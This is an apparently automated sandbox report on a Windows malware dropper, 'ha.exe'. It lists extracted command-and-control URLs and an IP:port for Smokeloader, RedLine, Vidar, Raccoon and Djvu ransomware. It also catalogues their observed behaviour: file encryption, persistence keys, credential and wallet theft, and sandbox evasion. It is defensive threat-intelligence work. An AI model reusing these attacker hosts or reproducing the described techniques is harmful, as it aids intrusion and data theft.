Analysis
-
max time kernel
2701s -
max time network
2693s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
23-10-2021 15:47
Static task
static1
Behavioral task
behavioral1
Sample
ha.exe
Resource
win10-en-20210920
General
-
Target
ha.exe
-
Size
4.9MB
-
MD5
2e366651b4505eadbeca48889144f452
-
SHA1
4c729b09c03f98019c0cf19fd3f22b7500772f3f
-
SHA256
070798072999f8c0c6bdf3c166e42c2eeb2d50a446d2710a2b581c51dd221b3d
-
SHA512
6ab6940151b61c03a18b0157e59d4918ac64237cad1f399d0a04d03ecf651145158c84515a2e74a925ea4cc3386b459cc049cd645ec52babc6287ee4127bad5f
Malware Config
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
redline
ChrisNEW
194.104.136.5:46013
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6412 4472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10840 4472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 4472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6368 4472 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3896 4472 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4332-294-0x0000000000418542-mapping.dmp family_redline behavioral1/memory/4332-286-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 7 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedcfbdigWerFault.exeWerFault.exedescription pid process target process PID 5444 created 4044 5444 WerFault.exe Sat14febbc433.exe PID 5840 created 5028 5840 WerFault.exe setup.exe PID 6548 created 5860 6548 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe PID 7400 created 4536 7400 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe PID 8124 created 8448 8124 dcfbdig mshta.exe PID 8652 created 9332 8652 WerFault.exe GcleanerEU.exe PID 9776 created 6372 9776 WerFault.exe safbdig -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral1/memory/3108-343-0x0000000000C40000-0x0000000000D16000-memory.dmp family_vidar behavioral1/memory/3108-341-0x0000000000400000-0x00000000008EF000-memory.dmp family_vidar behavioral1/memory/5844-496-0x0000000000400000-0x00000000008EE000-memory.dmp family_vidar behavioral1/memory/5844-512-0x0000000000D70000-0x0000000000E46000-memory.dmp family_vidar behavioral1/memory/6120-641-0x0000000000400000-0x00000000008EE000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS088B1E86\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS088B1E86\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
rundll32.execmd.exemshta.exepowershell.execmd.exeMsiExec.exemsiexec.execmd.execmd.exepowershell.exeMsiExec.exeflow pid process 90 2228 rundll32.exe 92 2228 rundll32.exe 101 2228 rundll32.exe 102 2228 rundll32.exe 105 2228 rundll32.exe 106 2228 rundll32.exe 191 2220 cmd.exe 192 2220 cmd.exe 987 8448 mshta.exe 1031 10040 powershell.exe 1035 10212 cmd.exe 1120 7732 MsiExec.exe 1126 9696 msiexec.exe 1129 9696 msiexec.exe 1130 9696 msiexec.exe 1158 7732 MsiExec.exe 1205 8368 cmd.exe 1207 8368 cmd.exe 1211 8368 cmd.exe 1269 3036 cmd.exe 1308 3036 cmd.exe 1364 8912 powershell.exe 1366 8912 powershell.exe 1641 3036 cmd.exe 1659 11128 MsiExec.exe 1664 11128 MsiExec.exe 1665 11128 MsiExec.exe 1666 11128 MsiExec.exe 1667 11128 MsiExec.exe 1668 11128 MsiExec.exe 1669 11128 MsiExec.exe 1670 11128 MsiExec.exe 1671 11128 MsiExec.exe 1672 11128 MsiExec.exe 1673 11128 MsiExec.exe 1674 11128 MsiExec.exe 1677 11128 MsiExec.exe 1678 11128 MsiExec.exe 1679 11128 MsiExec.exe 1680 11128 MsiExec.exe 1681 11128 MsiExec.exe 1682 11128 MsiExec.exe 1683 11128 MsiExec.exe 1684 11128 MsiExec.exe 1685 11128 MsiExec.exe 1686 11128 MsiExec.exe 1687 11128 MsiExec.exe 1688 11128 MsiExec.exe 1689 11128 MsiExec.exe 1692 11128 MsiExec.exe 1695 11128 MsiExec.exe 1696 11128 MsiExec.exe 1698 11128 MsiExec.exe 1699 11128 MsiExec.exe 1700 11128 MsiExec.exe 1701 11128 MsiExec.exe 1702 11128 MsiExec.exe 1703 11128 MsiExec.exe 1704 11128 MsiExec.exe 1705 11128 MsiExec.exe 1706 11128 MsiExec.exe 1707 11128 MsiExec.exe 1708 11128 MsiExec.exe 1709 11128 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
Processes:
DrvInst.exeDYbALA.exeDYbALA.exeDYbALA.exedescription ioc process File opened for modification C:\Windows\System32\drivers\SETE3B6.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETE3B6.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
CrowdInspect64.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeSat14d32a38896785b13.exeSat14f1396dfcf191bd.exeSat14febbc433.exeSat142ac5249376e895.exeSat14514904a4b.exeSat142b09ae40c44cf.exeSat14b47e86b9c16b.exeSat1481f5a7e3eccdd.execmd.exeSat1487ca754e680f91.exeSat144474a564d26f29.exeSat1427fbafcf251.exeSat1481f5a7e3eccdd.tmpSat1481f5a7e3eccdd.exe5025751.exeSat1481f5a7e3eccdd.tmpLzmwAqmV.exe7536159.exe7977000.exeBCleanSoft82.exeJYCWewAX2vPOJ.EXESat1427fbafcf251.exe3340470.exewerfault.exe7477494.exeConhost.execmd.exe5.exesearch_hyperfs_206.exesetup.exeWinHoster.exeCalculator Installation.exepostback.exea6a2ZQhj6hMi6OZQH8Nm4nCs.exekPBhgOaGQk.exex6z6NjXcCh4bSMjVQsnzBW81.exeLzmwAqmV.exe7PeayF9Tb5XcknwhFlZFItg1.exeXcYMp2GmVj2G6dzAdKSZf0P2.exe_0aRxV7zFs9aNhsV38TcVZ3L.exeZXcnQ9RG_DYkOXXTxjQ0IPtt.exeB8YkkT0rY7k3CXY_wSzatFSY.exezcwm5iBuVOBi3eEoRbXV0gY2.exeB8YkkT0rY7k3CXY_wSzatFSY.exezcwm5iBuVOBi3eEoRbXV0gY2.exeHucq3cRU783T_YaR6f0rcMBe.exeVcbaY0rxppQvxsF6Dhkdg4_f.exeoNHOyUQ3HKSKoT6WvbTWcZUk.exeDg_Ebh8ihIYC1JCfpRAyNWiT.exeBeNlWgh16GLAdiYLOwOe1lqZ.exesDpSUCcF7crBKFAL0nlkdsFL.exeWerFault.exepkEHV3QnxJNQawwSUY_T9v6l.exeDllHost.exeghyLwzsW68yJrRDdcOnQsReb.exe1luUodQBKunwgCepAZE5m_rN.exeB_jeA9OMEfd0MmBnOrj56I2B.exeKnv5tLGcITqzriOiFtbYIHkp.exeConhost.exepid process 3212 CrowdInspect64.exe 1044 setup_x86_x64_install.exe 2176 setup_installer.exe 3120 setup_install.exe 1108 Sat14d32a38896785b13.exe 3848 Sat14f1396dfcf191bd.exe 4044 Sat14febbc433.exe 3628 Sat142ac5249376e895.exe 512 Sat14514904a4b.exe 3624 Sat142b09ae40c44cf.exe 1112 Sat14b47e86b9c16b.exe 2164 Sat1481f5a7e3eccdd.exe 2116 cmd.exe 2228 Sat1487ca754e680f91.exe 2352 Sat144474a564d26f29.exe 68 Sat1427fbafcf251.exe 1412 Sat1481f5a7e3eccdd.tmp 4200 Sat1481f5a7e3eccdd.exe 4280 5025751.exe 4380 Sat1481f5a7e3eccdd.tmp 4468 LzmwAqmV.exe 4672 7536159.exe 4780 7977000.exe 4804 BCleanSoft82.exe 4816 JYCWewAX2vPOJ.EXE 4332 Sat1427fbafcf251.exe 4888 3340470.exe 4928 werfault.exe 5020 7477494.exe 3108 Conhost.exe 2220 cmd.exe 860 5.exe 2184 search_hyperfs_206.exe 5028 setup.exe 4692 WinHoster.exe 2336 Calculator Installation.exe 1472 postback.exe 2116 cmd.exe 4932 a6a2ZQhj6hMi6OZQH8Nm4nCs.exe 5320 kPBhgOaGQk.exe 5512 x6z6NjXcCh4bSMjVQsnzBW81.exe 5592 LzmwAqmV.exe 5804 7PeayF9Tb5XcknwhFlZFItg1.exe 5844 XcYMp2GmVj2G6dzAdKSZf0P2.exe 5860 _0aRxV7zFs9aNhsV38TcVZ3L.exe 5956 ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe 5988 B8YkkT0rY7k3CXY_wSzatFSY.exe 6024 zcwm5iBuVOBi3eEoRbXV0gY2.exe 1932 B8YkkT0rY7k3CXY_wSzatFSY.exe 816 zcwm5iBuVOBi3eEoRbXV0gY2.exe 6052 Hucq3cRU783T_YaR6f0rcMBe.exe 6120 VcbaY0rxppQvxsF6Dhkdg4_f.exe 4320 oNHOyUQ3HKSKoT6WvbTWcZUk.exe 5248 Dg_Ebh8ihIYC1JCfpRAyNWiT.exe 3076 BeNlWgh16GLAdiYLOwOe1lqZ.exe 5728 sDpSUCcF7crBKFAL0nlkdsFL.exe 4488 WerFault.exe 4800 pkEHV3QnxJNQawwSUY_T9v6l.exe 2952 DllHost.exe 5132 ghyLwzsW68yJrRDdcOnQsReb.exe 2204 1luUodQBKunwgCepAZE5m_rN.exe 5920 B_jeA9OMEfd0MmBnOrj56I2B.exe 2684 Knv5tLGcITqzriOiFtbYIHkp.exe 6116 Conhost.exe -
Modifies Installed Components in the registry 2 TTPs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
E757.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertToWrite.raw => C:\Users\Admin\Pictures\ConvertToWrite.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\RevokeMove.raw => C:\Users\Admin\Pictures\RevokeMove.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\AddRename.raw => C:\Users\Admin\Pictures\AddRename.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\ApproveFormat.raw => C:\Users\Admin\Pictures\ApproveFormat.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\OpenExpand.raw => C:\Users\Admin\Pictures\OpenExpand.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\OptimizeUninstall.raw => C:\Users\Admin\Pictures\OptimizeUninstall.raw.zaps E757.exe File renamed C:\Users\Admin\Pictures\UnlockReceive.crw => C:\Users\Admin\Pictures\UnlockReceive.crw.zaps E757.exe File opened for modification C:\Users\Admin\Pictures\DenyRequest.tiff E757.exe File renamed C:\Users\Admin\Pictures\DenyRequest.tiff => C:\Users\Admin\Pictures\DenyRequest.tiff.zaps E757.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
366B.exeZXcnQ9RG_DYkOXXTxjQ0IPtt.exeDg_Ebh8ihIYC1JCfpRAyNWiT.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 366B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Dg_Ebh8ihIYC1JCfpRAyNWiT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Dg_Ebh8ihIYC1JCfpRAyNWiT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 366B.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
E757.exe7590801.exeCalculator.exeCalculator.exeCalculator.exeSettings.exeSettings.exeSat144474a564d26f29.exeQidymacano.exeBaekefeletu.exeFaster.execmd.exe79BLy9HRraJ1saUAfrFwsTrz.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation E757.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation 7590801.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Settings.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Settings.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Sat144474a564d26f29.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Qidymacano.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Baekefeletu.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Faster.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation 79BLy9HRraJ1saUAfrFwsTrz.exe -
Drops startup file 1 IoCs
Processes:
A2E0.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk A2E0.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSat1481f5a7e3eccdd.tmpSat1481f5a7e3eccdd.tmpCalculator Installation.exeConhost.exerundll32.exemsiexec.exeGKWt8jAAi7IwCqNCN3FGm_q4.tmpsetup.exeVQkGBnO_XmTtKCVqhBHSUro2.exeConhost.exeaDm5wtNVVBVZLktXPpIsLYMC.tmpsetup.exeX9CrMOGrOpPKIZqgtV8aNLBI.exemsiexec.exeCalculator.exesetting.exeCalculator.exeCalculator.exeinstaller.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exepid process 3120 setup_install.exe 3120 setup_install.exe 3120 setup_install.exe 3120 setup_install.exe 3120 setup_install.exe 3120 setup_install.exe 3120 setup_install.exe 1412 Sat1481f5a7e3eccdd.tmp 4380 Sat1481f5a7e3eccdd.tmp 2336 Calculator Installation.exe 2336 Calculator Installation.exe 5328 Conhost.exe 2336 Calculator Installation.exe 2336 Calculator Installation.exe 2336 Calculator Installation.exe 6396 rundll32.exe 6856 msiexec.exe 6856 msiexec.exe 3972 GKWt8jAAi7IwCqNCN3FGm_q4.tmp 3752 setup.exe 3752 setup.exe 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 6516 Conhost.exe 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 5192 aDm5wtNVVBVZLktXPpIsLYMC.tmp 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 5216 VQkGBnO_XmTtKCVqhBHSUro2.exe 6268 setup.exe 6268 setup.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 7860 msiexec.exe 7860 msiexec.exe 3752 setup.exe 3752 setup.exe 3388 Calculator.exe 3752 setup.exe 3388 Calculator.exe 3388 Calculator.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 5064 setting.exe 6004 Calculator.exe 8132 Calculator.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 7836 installer.exe 7836 installer.exe 7480 X9CrMOGrOpPKIZqgtV8aNLBI.exe 8712 Calculator.exe 8712 Calculator.exe 8712 Calculator.exe 8712 Calculator.exe 8944 Calculator.exe 8944 Calculator.exe 8944 Calculator.exe 9052 Calculator.exe 9052 Calculator.exe 9052 Calculator.exe 9116 Calculator.exe 9140 Calculator.exe 9140 Calculator.exe 9140 Calculator.exe 9140 Calculator.exe 9116 Calculator.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Settings.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Settings.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Settings.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Settings.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
setup.exeaipackagechainer.exeE757.exe3340470.exeDYbALA.exesetup.exeSettings%20Installation.exeDYbALA.exesetup.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e016a640-be85-42ec-91ac-8bb6fe5ea86a\\E757.exe\" --AutoStart" E757.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3340470.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gituzhuzhaesae.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Settings%20Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Kijeraerilae.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --loGQqfG2tg" Settings%20Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe -
Checks for any installed AV software in registry 1 TTPs 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md8_8eus.exelighteningplayer-cache-gen.exenote866.exeZXcnQ9RG_DYkOXXTxjQ0IPtt.exeDg_Ebh8ihIYC1JCfpRAyNWiT.exe366B.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lighteningplayer-cache-gen.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note866.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Dg_Ebh8ihIYC1JCfpRAyNWiT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 366B.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
setting.exeinstaller.exemsiexec.exesvchost.exedescription ioc process File opened (read-only) \??\Y: setting.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\P: setting.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: setting.exe File opened (read-only) \??\F: setting.exe File opened (read-only) \??\O: setting.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\L: setting.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\K: setting.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: setting.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: setting.exe File opened (read-only) \??\V: setting.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\J: setting.exe File opened (read-only) \??\Q: setting.exe File opened (read-only) \??\T: setting.exe File opened (read-only) \??\U: setting.exe File opened (read-only) \??\F: svchost.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: setting.exe File opened (read-only) \??\B: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 32 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 152 ipinfo.io 553 ipinfo.io 569 ipinfo.io 966 ip-api.com 630 wtfismyip.com 739 wtfismyip.com 1763 api.2ip.ua 1829 api.2ip.ua 151 ipinfo.io 996 ipinfo.io 1001 ipinfo.io 1060 wtfismyip.com 1764 api.2ip.ua 1810 api.2ip.ua 185 ipinfo.io 417 ipinfo.io 1230 api.2ip.ua 1231 api.2ip.ua 1775 api.2ip.ua 1809 api.2ip.ua 98 ip-api.com 384 ipinfo.io 741 wtfismyip.com 554 ipinfo.io 627 wtfismyip.com 874 wtfismyip.com 1063 wtfismyip.com 1283 api.2ip.ua 383 ipinfo.io 689 ip-api.com 1816 api.2ip.ua 1820 ip-api.com -
Drops file in System32 directory 63 IoCs
Processes:
svchost.exesvchost.exemask_svc.exeDrvInst.exerundll32.execonhost.exeDrvInst.exerundll32.exeMicrosoftEdgeCP.execonhost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent CD195E150EE449EB svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\Smart Clock svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3 mask_svc.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAC.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAD.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAC.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification 